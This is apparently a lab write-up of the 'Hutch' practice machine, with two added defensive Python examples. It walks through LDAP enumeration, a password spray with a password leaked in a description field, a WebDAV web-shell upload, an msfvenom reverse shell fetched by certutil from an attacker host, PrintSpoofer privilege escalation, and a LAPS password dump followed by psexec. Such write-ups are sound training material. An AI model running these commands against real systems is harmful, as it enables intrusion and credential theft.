Hutch Write-up

Welcome to my Hutch Write-up

Recon

$ sudo nmap -sSVC -A -oA nmap 192.168.191.122


Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-08 06:10 EDT
PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-webdav-scan: 
|   Server Date: Sun, 08 Oct 2023 10:13:41 GMT
|   WebDAV type: Unknown
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, PROPPATCH, MKCOL, LOCK, UNLOCK
|   Server Type: Microsoft-IIS/10.0
|_  Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-10-08 10:11:16Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port

ALL PORTS SCAN

$ nmap -p- --min-rate=20000 192.168.191.122


Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-08 06:12 EDT
Nmap scan report for 192.168.191.122

PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49666/tcp open  unknown
49667/tcp open  unknown
49671/tcp open  unknown
49672/tcp open  unknown
49674/tcp open  unknown
49687/tcp open  unknown
49759/tcp open  unknown

UDP PORTS SCAN

$ sudo nmap -sU -Pn --min-rate=5000 192.168.191.122


Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-08 06:10 EDT
Nmap scan report for 192.168.191.122

PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap

LDAP enumeration using nmap:

$ nmap -n -sV --script "ldap* and not brute" 192.168.191.122



NOTE: the following commands didn’t work for me

$ ldapsearch -x -h 192.168.191.122 -D '' -w '' -b "DC=hutch,DC=offsec" | grep sAMAccountName:



$ ldapsearch -x -H 192.168.191.122 -D '' -w '' -b "DC=hutch,DC=offsec" | grep sAMAccountName:



Run this instead (-H takes a full LDAP URI such as ldap://host, and the old -h host form is no longer accepted by current ldapsearch):

$ ldapsearch -x -H ldap://192.168.191.122 -D '' -w '' -b "DC=hutch,DC=offsec" | grep sAMAccountName:



Let’s save all these users in a file (users.txt), which we reuse for the password spray below.

$ ldapsearch -x -H ldap://192.168.191.122 -D '' -w '' -b "DC=hutch,DC=offsec" | grep description


One account’s description attribute contains a password:

‘Password set to CrabSharkJellyfish192 at user’s request. Please c’

Password: CrabSharkJellyfish192

$ crackmapexec smb 192.168.191.122 -u users.txt -p CrabSharkJellyfish192



The password is valid for fmcsorley, so let’s enumerate SMB with those credentials.

$ smbclient -L 192.168.191.122 -U fmcsorley --password='CrabSharkJellyfish192'



These look like the default shares; I tried checking them out but didn’t find anything interesting.

Initial Foothold


$ cadaver http://192.168.191.122


Username: fmcsorley, Password: CrabSharkJellyfish192

WebDAV accepts authenticated uploads (PUT is among the allowed methods in the nmap output), so we can upload cmdasp.aspx into the web application running on port 80.

dav:/> put cmdasp.aspx


The web shell is then reachable at http://192.168.191.122/cmdasp.aspx


Note: instead of cadaver we could also have used: curl -T '/home/kali/shell.aspx' 'http://192.168.191.122/' -u fmcsorley:CrabSharkJellyfish192


Let’s generate a reverse shell with msfvenom and pull it onto the target with certutil.

$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.158 LPORT=1234 -f exe > shell1.exe


certutil.exe -urlcache -split -f http://192.168.45.158:5985/shell1.exe c:\users\public\shell.exe


c:\users\public\shell.exe
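
From the defender’s side, each step of this foothold chain (a shell spawned by the IIS worker process, certutil fetching a binary over HTTP, and a payload executed from C:\Users\Public) leaves a process-creation event. The following is an added example, not code from this write-up: three detection rules run over constructed Sysmon-style records, including benign look-alikes that must not alert.

```python
import re

# Constructed Sysmon Event ID 1 style records (Image, ParentImage, CommandLine), not telemetry from
# the box. The first three mirror the write-up's chain; the last two are benign look-alikes.
EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": r'cmd.exe /c "whoami /priv"'},
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://192.168.45.158:5985/shell1.exe c:\users\public\shell.exe"},
    {"Image": r"C:\Users\Public\shell.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"c:\users\public\shell.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil.exe -verify -urlfetch C:\certs\server.cer"},   # AIA fetch, legitimate
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": r"csc.exe /noconfig /fullpaths @C:\Windows\Temp\abc.cmdline"},  # ASP.NET compile
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)

def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()

def iis_worker_spawned_shell(ev):
    """w3wp.exe (the IIS worker) starting a command interpreter: the classic web-shell tell."""
    return image_name(ev["ParentImage"]) == "w3wp.exe" and image_name(ev["Image"]) in SHELLS

def certutil_url_download(ev):
    """certutil with -urlcache and -f (or /urlcache, /f) plus a URL: certutil used as a downloader."""
    if image_name(ev["Image"]) != "certutil.exe":
        return False
    switches = {t.lstrip("-/").lower() for t in ev["CommandLine"].split() if t[:1] in "-/"}
    return "urlcache" in switches and "f" in switches and bool(URL_RE.search(ev["CommandLine"]))

def run_from_public(ev):
    # Anything executed out of the world-writable C:\Users\Public tree.
    return ev["Image"].lower().startswith("c:\\users\\public\\")

RULES = {"iis_worker_spawned_shell": iis_worker_spawned_shell,
         "certutil_url_download": certutil_url_download,
         "executable_in_users_public": run_from_public}

def detect(events):
    """Return (rule_name, CommandLine) for every event matching a rule, in event order."""
    return [(name, ev["CommandLine"]) for ev in events for name, rule in RULES.items() if rule(ev)]
```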



Privilege Escalation

c:\windows\system32\inetsrv>whoami /priv



SeImpersonatePrivilege is enabled, which means we can use PrintSpoofer (or JuicyPotato if PrintSpoofer fails).

c:\windows\system32\inetsrv>certutil -urlcache -split -f http://192.168.45.158:5985/PrintSpoofer64.exe c:\users\public\printspoofer.exe


c:\windows\system32\inetsrv>c:\users\public\printspoofer.exe -i -c powershell.exe



PS C:\users\fmcsorley\desktop> type local.txt ;whoami ;hostname ;ipconfig



PS C:\users\administrator\desktop> type proof.txt ;whoami ;hostname ;ipconfig



Second Method:

This one is actually much easier.


$ ldapsearch -x -H ldap://192.168.191.122 -D 'hutch\fmcsorley' -w 'CrabSharkJellyfish192' -b 'dc=hutch,dc=offsec' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd



administrator:G.5#w6MOz34lqW

$ crackmapexec smb 192.168.191.122 -d hutch.offsec -u administrator -p 'G.5#w6MOz34lqW'


$ python3 /usr/share/doc/python3-impacket/examples/psexec.py administrator:G.5#w6MOz34lqW@192.168.191.122
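
Both LDAP findings in this write-up (the password left in a user’s description attribute, and the LAPS-managed local Administrator password in ms-Mcs-AdmPwd being readable by an ordinary domain account) can be caught by auditing the LDIF that an ldapsearch run as a low-privileged user returns. The example below is added here and is not the author’s code: it parses constructed LDIF (the DNs and values are made up) and reports which entries expose secrets without echoing them.

```python
import base64
import re

# Constructed ldapsearch-style LDIF, not output captured from the box: a folded description, a base64 one, a LAPS attribute.
SAMPLE_LDIF = """\
# extended LDIF
dn: CN=fmcsorley,CN=Users,DC=hutch,DC=offsec
description: Temporary password Winter2023! set at user's
  request, please change it at next logon

dn: CN=jdoe,CN=Users,DC=hutch,DC=offsec
description: Helpdesk analyst

dn: CN=svc-backup,CN=Users,DC=hutch,DC=offsec
description:: UGFzc3dvcmQ6IFN1bW1lcjIwMjMh

dn: CN=DC01,OU=Domain Controllers,DC=hutch,DC=offsec
ms-Mcs-AdmPwd: ExampleLapsSecret123
"""
CRED_HINT = re.compile(r"\b(pass(word|wd)?|pwd|credential)s?\b", re.IGNORECASE)
LAPS_ATTR = "ms-mcs-admpwd"  # LAPS keeps the local Administrator password here in cleartext

def parse_ldif(text):
    """One {attribute: [values]} dict per entry; handles comments, folded lines and '::' base64 values."""
    text = re.sub(r"\r?\n ", "", text)                   # unfold: newline + one space joins lines
    entries = []
    for block in re.split(r"\n\s*\n", text.strip()):     # a blank line separates entries
        entry = {}
        for line in block.splitlines():
            if line.startswith("#"):
                continue
            name, _, value = line.partition(":")
            if value.startswith(":"):                    # "attr:: <base64>"
                value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
            entry.setdefault(name.lower(), []).append(value.strip())
        if entry:
            entries.append(entry)
    return entries

def audit(ldif_text, privileged_bind=False):
    """Report (dn, attribute, reason) for secrets exposed to the account that ran the search; values are never echoed."""
    findings = []
    for entry in parse_ldif(ldif_text):
        dn = entry.get("dn", ["<no dn>"])[0]
        if any(CRED_HINT.search(d) for d in entry.get("description", [])):
            findings.append((dn, "description", "credential-like text in description"))
        if not privileged_bind and LAPS_ATTR in entry:
            findings.append((dn, "ms-Mcs-AdmPwd", "LAPS password readable by this account"))
    return findings
```

Run it against the LDIF of an unprivileged bind (as in this write-up); any ms-Mcs-AdmPwd that comes back means read rights on that attribute have been delegated too broadly.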


This post is licensed under CC BY 4.0 by the author.